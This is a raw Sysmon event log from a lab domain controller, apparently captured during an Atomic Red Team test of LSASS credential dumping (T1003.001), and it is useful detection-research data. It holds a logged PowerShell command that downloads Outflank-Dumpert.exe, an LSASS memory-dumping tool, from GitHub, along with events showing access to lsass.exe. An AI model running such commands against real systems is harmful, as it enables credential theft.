21:09:55.682{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000024973Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:09:55.667{4DB9351A-A323-60D3-3406-00000000CF01}6980\PSHost.132689561955749519.6980.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000024972Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.635{4DB9351A-A323-60D3-3406-00000000CF01}6980ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_sq13ekxb.sxt.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.635{4DB9351A-A323-60D3-3406-00000000CF01}6980ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4fhjeq4b.ir3.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000024970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.620{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_4fhjeq4b.ir3.ps12021-06-23 21:09:55.620 10341000x800000000000000024969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.605{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000024966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A323-60D3-3306-00000000CF01}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024965Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024964Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024963Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024962Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024961Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024960Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024959Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9E1D-60D3-8B00-00000000CF01}47084724C:\Windows\system32\csrss.exe{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024958Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024957Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024956Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 10341000x800000000000000024955Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A323-60D3-3306-00000000CF01}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 154100x800000000000000024954Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.574{4DB9351A-A323-60D3-3406-00000000CF01}6980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -ItemType Directory (Split-Path C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe) -Force | Out-Null Invoke-WebRequest \""https://github.com/clr2of8/Dumpert/raw/5838c357224cc9bc69618c80c2b5b2d17a394b10/Dumpert/x64/Release/Outflank-Dumpert.exe\"" -OutFile C:\AtomicRedTeam\atomics\T1003.001\bin\Outflank-Dumpert.exe} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 10341000x800000000000000024953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A323-60D3-3306-00000000CF01}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000024952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.574{4DB9351A-A323-60D3-3306-00000000CF01}5172C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 11241100x800000000000000024951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.573{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000024950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.557{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000024949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.542{4DB9351A-A323-60D3-3206-00000000CF01}4356ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024948Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.479{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024947Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.479{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024946Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:09:55.448{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A323-60D3-3206-00000000CF01}4356C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024945Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 